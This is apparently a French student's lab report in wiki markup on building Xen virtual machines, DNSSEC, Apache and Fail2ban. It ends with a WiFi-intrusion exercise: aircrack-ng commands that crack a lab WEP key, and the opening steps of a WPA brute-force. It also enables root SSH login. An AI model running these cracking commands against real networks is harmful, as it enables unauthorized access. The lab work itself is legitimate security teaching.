root@capbreton:/var# xen list | grep Tom&lt;br /&gt;
SE4-Tompere1                               389  2048     1     -b----    3574.5&lt;br /&gt;
SE4-Tompere2                               390  2048     1     -b----    3343.2&lt;br /&gt;
SE4-Tompere0                               399  2048     1     -b----    8849.0&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Comme on le voit,  nos 3 machines sont démarrées !&lt;br /&gt;
&lt;br /&gt;
=== Partionnage ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration ====&lt;br /&gt;
On ajoute dans le fichier &amp;lt;code&amp;gt;/etc/xen/SE4-Tompere2.cfg&amp;lt;/code&amp;gt; nos partitions '''home''' et '''var'''.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
    root        = '/dev/xvda2 ro'&lt;br /&gt;
    disk        = [&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/disk.img,xvda2,w',&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/swap.img,xvda1,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-home,xvda3,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-var,xvdb1,w',&lt;br /&gt;
                ]&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Montage des partitions ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvdb1 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le montage des partitions est fait ! On peut par ailleurs le voir via &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;. Cependant, au redémarrage de la VM, les partitions ne seront pas automatiquement montées. Ainsi, il faut modifier le fichier &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
proc            /proc           proc    defaults        0       0&lt;br /&gt;
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nos partitions '''var''' et '''home''' seront bien montés comme il se doit au démarrage.&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
Ajouter une configuration réseau à nos machines virtuelles est essentiel pour accéder à Internet et pour pouvoir utiliser SSH sur nos machines depuis l'extérieur. C'est ce que nous allons voir dans cette partie.&lt;br /&gt;
&lt;br /&gt;
=== Ping entre les deux machines de services ===&lt;br /&gt;
Comme premier jalon, intéressons nous à la façon de relier nos machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons d'abord modifier les fichiers &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Sur ma machine de services TomPere2 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto eth0&lt;br /&gt;
	iface eth0 inet static&lt;br /&gt;
		address 192.168.0.3&lt;br /&gt;
		netmask 255.255.255.0&lt;br /&gt;
		gateway 192.168.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et sur la machine mandataire TomPere0 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.0.1&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.168&lt;br /&gt;
    netmask 255.255.255.224&lt;br /&gt;
    gateway 193.48.57.162&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après un &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; puis &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt; pour charger les modifications apportées, cette configuration nous a permis de voir l'adresse IPV4 correspondante à &amp;lt;code&amp;gt;eth0&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;ip address&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
De ce fait, nous avons pu '''ping''' d'une machine à l'autre via le commutateur virtuel.&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+IPs de TomPere1&lt;br /&gt;
!TomPere1&lt;br /&gt;
!IPs&lt;br /&gt;
|-&lt;br /&gt;
|IPv4&lt;br /&gt;
|192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
|IPv6&lt;br /&gt;
|2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
|}&lt;br /&gt;
Nous pouvons voir dans le tableau ci-dessus les '''IPs de la machine de service TomPere1''', ce qui nous permettra de '''tester la connexion avec l'utilitaire ping'''.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 192.168.0.2&lt;br /&gt;
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=1 ttl=64 time=0.236 ms&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=2 ttl=64 time=0.459 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
PING 2001:660:4401:60a0:216:3eff:fe4b:1909 (2001:660:4401:60a0:216:3eff:fe4b:1909) 56 data bytes&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=1 ttl=64 time=0.293 ms&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=2 ttl=64 time=0.249 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;TomPere 2 reçoit bien une réponse !&lt;br /&gt;
&lt;br /&gt;
=== SSH depuis l'extérieur ===&lt;br /&gt;
Pour pouvoir se SSH depuis l'extérieur, il faut commencer par activer l'option sur les machines.&lt;br /&gt;
&lt;br /&gt;
Pour cela, rien de plus simple, il faut aller dans le fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; des VMs et activer la directive &amp;lt;code&amp;gt;PermitRootLogin&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, l'accès de root à distance est autorisé. On peut donc se '''ssh de TomPere2 vers TomPere1 et inversement''' !&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ssh root@2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;C'est pratique, mais ce n'est pas encore ce que l'on veut.&lt;br /&gt;
&lt;br /&gt;
Nous voulons pouvoir se SSH depuis l'extérieur. L'idée va être de dire à la machine mandataire de rediriger certains ports que l'on choisit, vers les machines de services.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, nous appliquerons la redirection suivante :&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Nom de la VM&lt;br /&gt;
!Port de redirection associé&lt;br /&gt;
|-&lt;br /&gt;
|TomPere1&lt;br /&gt;
|2201&lt;br /&gt;
|-&lt;br /&gt;
|TomPere2&lt;br /&gt;
|2202&lt;br /&gt;
|}&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Création des chaînes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
nft add chain PREROUTING&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Redirection des ports :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
nft add rule NAT PREROUTING tcp dport 2201 dnat to 192.168.0.2:22&lt;br /&gt;
nft add rule NAT PREROUTING tcp dport 2202 dnat to 192.168.0.3:22&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Grâce à cette configuration nous pouvons nous connecter sur les machines de services en SSH depuis l'extérieur, via les commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
ssh root@193.48.57.168 -p2201&lt;br /&gt;
ssh root@193.48.57.168 -p2202&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, alors il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
inline-signing yes;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
